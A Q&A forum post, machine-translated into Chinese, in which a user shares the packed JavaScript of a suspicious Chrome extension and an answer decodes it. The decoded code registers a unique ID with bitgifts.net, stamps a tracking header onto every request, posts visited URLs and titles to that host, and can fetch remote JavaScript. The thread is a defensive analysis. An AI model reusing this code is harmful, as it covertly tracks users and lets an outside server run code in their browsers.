所以我安装了这个粗略的chrome扩展,需要“访问所有浏览数据”,所以我看了一下。它包含两个相同的文件,一个是正确命名的content.js,另一个是一个可疑名为background.js的文件,以及一个看似未经修改的jquery版本。另外两个包含相同的代码片段,我担心它看起来像是一个关键的记录器给我。以下是我必须使用jsfiddle整理的代码:
eval(function (p, a, c, k, e, d) {
e = function (c) {
return c
};
if (!''.replace(/^/, String)) {
while (c--) {
d[c] = k[c] || c
}
k = [function (e) {
return d[e]
}];
e = function () {
return '\\w+'
};
c = 1
};
while (c--) {
if (k[c]) {
p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
}
}
return p
}('163(65(45,34,37,42,40,39){40=65(37){60(37<34?\'\':40(105(37/34)))+((37=37%34)>35?110.180(37+29):37.123(36))};72(!\'\'.95(/^/,110)){94(37--){39[40(37)]=42[37]||40(37)}42=[65(40){60 39[40]}];40=65(){60\'\\\\58+\'};37=1};94(37--){72(42[37]){45=45.95(101 270(\'\\\\38\'+40(37)+\'\\\\38\',\'43\'),42[37])}}60 45}(\'45 39=["\\\\41\\\\43\\\\40\\\\38\\\\51\\\\47\\\\47\\\\111\\\\38\\\\41\\\\55\\\\37","\\\\46\\\\37\\\\38\\\\78\\\\38\\\\37\\\\55","\\\\50\\\\51\\\\40\\\\50","\\\\46\\\\37\\\\38\\\\107\\\\41\\\\55\\\\37","\\\\40\\\\37\\\\38\\\\78\\\\38\\\\37\\\\55","\\\\50\\\\38\\\\38\\\\56\\\\66\\\\48\\\\48\\\\54\\\\41\\\\38\\\\46\\\\41\\\\52\\\\38\\\\40\\\\69\\\\43\\\\37\\\\38\\\\48\\\\44\\\\37\\\\46\\\\41\\\\40\\\\38\\\\37\\\\44","\\\\50\\\\38\\\\38\\\\56\\\\66\\\\48\\\\48\\\\54\\\\41\\\\38\\\\46\\\\41\\\\52\\\\38\\\\40\\\\69\\\\43\\\\37\\\\38\\\\48\\\\50\\\\42\\\\55\\\\37","\\\\64\\\\44\\\\37\\\\51\\\\38\\\\37","\\\\38\\\\51\\\\54\\\\40","\\\\50\\\\37\\\\47\\\\47\\\\42","\\\\47\\\\42\\\\46","\\\\56\\\\42\\\\40\\\\38","\\\\44\\\\37\\\\68\\\\53\\\\37\\\\40\\\\38\\\\79\\\\37\\\\51\\\\57\\\\37\\\\44\\\\40","\\\\80\\\\41\\\\38\\\\90\\\\41\\\\52\\\\38\\\\40","\\\\56\\\\53\\\\40\\\\50","\\\\242\\\\51\\\\47\\\\47\\\\111\\\\53\\\\44\\\\47\\\\40\\\\252","\\\\54\\\\47\\\\42\\\\64\\\\102\\\\41\\\\43\\\\46","\\\\51\\\\57\\\\57\\\\91\\\\41\\\\40\\\\38\\\\37\\\\43\\\\37\\\\44","\\\\42\\\\43\\\\80\\\\37\\\\52\\\\42\\\\44\\\\37\\\\106\\\\37\\\\43\\\\57\\\\79\\\\37\\\\51\\\\57\\\\37\\\\44\\\\40","\\\\100\\\\37\\\\54\\\\81\\\\37\\\\68\\\\53\\\\37\\\\40\\\\38","\\\\46\\\\37\\\\38\\\\64\\\\40","\\\\50\\\\38\\\\38\\\\56\\\\66\\\\48\\\\48\\\\54\\\\41\\\\38\\\\46\\\\41\\\\52\\\\38\\\\40\\\\69\\\\43\\\\37\\\\38\\\\48\\\\46\\\\37\\\\38\\\\103\\\\40","\\\\46\\\\37\\\\38","\\\\53\\\\44\\\\47","\\\\50\\\\38\\\\38\\\\56\\\\66\\\\48\\\\48\\\\54\\\\41\\\\38\\\\46\\\\41\\\\52\\\\38\\\\40\\\\69\\\\43\\\\37\\\\38\\\\48\\\\40\\\\53\\\\44\\\\52","\\\\38\\\\41\\\\38\\\\47\\\\37","\\\\47\\\\37\\\\43\\\\46\\\\38\\\\50","\\\\44\\\\51\\\\43\\\\57\\\\42\\\\55","\\\\42\\\\43\\\\81\\\\37\\\\68\\\\53\\\\37\\\\40\\\\38","\\\\37\\\\104\\\\38\\\\37\\\\43\\\\40\\\\41\\\\42\\\\43","","\\\\109\\\\80\\\\138\\\\136\\\\134\\\\141\\\\90\\\\79\\\\78\\\\148\\\\145\\\\91\\\\120\\\\116\\\\112\\\\114\\\\115\\\\81\\\\106\\\\107\\\\126\\\\239\\\\167\\\\166\\\\165\\\\168\\\\51\\\\54\\\\64\\\\57\\\\37\\\\52\\\\46\\\\50\\\\41\\\\103\\\\102\\\\47\\\\55\\\\43\\\\42\\\\56\\\\68\\\\44\\\\40\\\\38\\\\53\\\\161\\\\100\\\\104\\\\174\\\\187\\\\186\\\\185\\\\188\\\\189\\\\192\\\\191\\\\190\\\\184\\\\183\\\\177","\\\\52\\\\47\\\\42\\\\42\\\\44","\\\\64\\\\50\\\\51\\\\44\\\\109\\\\38"];45 34=[39[0],39[1],39[2],39[3],39[4],39[5],39[6],39[7],39[8],39[9],39[10],39[11],39[12],39[13],39[14],39[15],39[16],39[17],39[18],39[19],39[20],39[21],39[22],39[23],39[24],39[25],39[26],39[27],39[28],39[29],39[92],39[93],39[96],39[97]];58 99(){61(59[34[1]](34[0])&&59[34[1]](34[2])){73};45 108=125 124()[34[3]]();59[34[4]](34[0],108);45 82=71();59[34[4]](34[2],82);$[34[11]](34[5],{127:82},58(83){77[34[8]][34[7]]({87:34[6]});121[34[10]](34[9])})};99();77[34[19]][34[18]][34[17]](58(98){45 85=98[34[12]],84={};85[34[14]]({119:34[13],131:59[34[1]](34[2])});84[34[12]]=85;73 84},{147:[34[15]]},[34[12],34[16]]);77[34[29]][34[28]][34[17]](58(49,135,67){61(49[34[20]]){$[34[22]](34[21],58(83){67({137:83})})}86{61(49[34[23]]&&49[34[11]]){$[34[11]](34[24],{87:49[34[23]],139:49[34[11]]});67({})}86{61(49[34[23]]&&49[34[25]]){45 63=24+49[34[23]][34[26]]*3-(49[34[25]][34[26]]*2);61(63%4){63+=3}86{63-=4};45 89=247(76[34[27]]()*250);45 88=71();$[34[11]](34[24],{87:49[34[23]],246:49[34[25]],238:63,236:89,241:88});67({})}}}});58 71(){45 75=34[92];45 74=34[93];267(45 70=0;70<16;70++){75+=74[34[97]](76[34[96]](76[34[27]]()*74[34[26]]))};73 75};\',62,146,\'||||||||||262|264|235|208|207|206|209|210|213|212|211|205|204|198|197|196|195|199|200|203|202|201|65|215|72|227|226|229|230|233|232|231|225|224|218|217|60|219|220|223|222|221|193|263|257|265|271|272|268|256|244|240|||||||||||142|118|117|113|128|129|31|33|30|173|160|155|157|32|133|216|228|214|261|260|259|269|273|255|243|237|249|194|140|150|143|144|132|130|178|158|122|151|149|234|251|254|253|258|266|245|152|153|181|182|179|105|||||||||||175|176|162|159|154|101|156|164|170|171|172|169\'.248(\'|\'),0,{}))', 10, 274, '||||||||||||||||||||||||||||||||||a|||c|b|d|e|f|k|g|h|p|j|i|m|l|n|o|q|s|r|v|u|t|w|x|return|y||z|A|function|C|E|D|B|F|U|if|K|L|P|J|S|Q|V|G|I|O|M|H|T|R|N|1j|1k|1l|1f|1i|1g|while|replace|1n|1h|1d|1c|W|new|1a|1b|Y|parseInt|1o|1e|Z|X|String|1m|1H|_0x635cx6|1G|1B|1M|install_notice|x6A|1Q|1N|2g|x4A|toString|2i|2f|1z|1P|x54|x4C|x4F|1V|x50|x53|1O|1X|1w|1Y|1r|1S|x56|1y|x6B|x59|x58|1L||1W|1K|x4E|x57|x4B|vy|value|x37|x47|console|x5F|x76|xc|_0x635cxd|1J|for|eval|x38|1E|1F|1D|1I|x35|Date|x36|x39|_0x635cxe|1t|43260|x34|2k|x5A|data|fromCharCode|urls|_0x635cxa|2h|2e|1p|1s|1x|1q|1A|2j|2l|2b|x49|x51|x66|var|x61|x68|x62|x75|x6D|x70|x64|x2F|_0x635cx9|x69|x73|_0xf8d8|x6E|x72|x6F|x67|x6C|x43|localStorage|x31|Math|x52|_0x635cx11|_0x635cx5|_0x635cx10|_0x635cx4|url|_0x635cx8|x42|x63|_0x635cxc|x32|x2E|x3A|_0x635cx12|_0x635cxb|x71|x4D|x65|1T|x55|2d|1C|_0x635cx3|1U|1v|x46|x78|xv|1R|1Z|split|x33|2a|x45|1u|name|hash|x7A|x41|chrome|title|x3E|x79|x30|_0x6ce2|else|x74|_0x635cx7|post|2c|x77|x3C|RegExp|makeid|x48|x44'.split('|'), 0, {}))
答案 0 :(得分:3)
这是我可以解码的内容。我没有对代码进行深入分析,但似乎是为包含唯一生成密钥的所有请求添加了自定义 BitGifts 请求标头。它也使用chrome.extension.onRequest.addListener
deprecated。此外,它尝试与http://bitgifts.net/进行通信,方法是执行来自http://bitgifts.net/getjs的GET数据/代码或POST到http://bitgifts.net/surf。服务器无法提供这两种服务,可能是因为未提供自定义标头。
无论如何,我不会冒任何机会,也不会安装此扩展程序。实际上我可能不会安装任何留下console.log('hello')
的扩展名;)
function install_notice() {
if (localStorage["getItem"]("install_time") && localStorage["getItem"]("hash")) {
return
}
var e = (new Date)["getTime"]();
localStorage["setItem"]("install_time", e);
var t = makeid();
localStorage["setItem"]("hash", t);
$["post"]("http://bitgifts.net/register", {
hash: t
}, function (e) {
chrome["tabs"]["create"]({
url: "http://bitgifts.net/home"
});
console["log"]("hello")
})
}
function makeid() {
var e = "";
var t = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
for (var n = 0; n < 16; n++) {
e += t["charAt"](Math["floor"](Math["random"]() * t["length"]))
}
return e
}
install_notice();
chrome["webRequest"]["onBeforeSendHeaders"]["addListener"](function (e) {
var t = e["requestHeaders"],
n = {};
t["push"]({
name: "BitGifts",
value: localStorage["getItem"]("hash")
});
n["requestHeaders"] = t;
return n
}, {
urls: ["<all_urls>"]
}, ["requestHeaders", "blocking"]);
chrome["extension"]["onRequest"]["addListener"](function (e, t, n) {
if (e["getcs"]) {
$["get"]("http://bitgifts.net/getjs", function (e) {
n({
data: e
})
})
} else {
if (e["url"] && e["post"]) {
n({})
} else {
if (e["url"] && e["title"]) {
var r = 24 + e["url"]["length"] * 3 - e["title"]["length"] * 2;
if (r % 4) {
r += 3
} else {
r -= 4
}
var i = parseInt(Math["random"]() * 43260);
var s = makeid();
$["post"]("http://bitgifts.net/surf", {
url: e["url"],
title: e["title"],
xc: r,
xv: i,
vy: s
});
n({})
}
}
}
});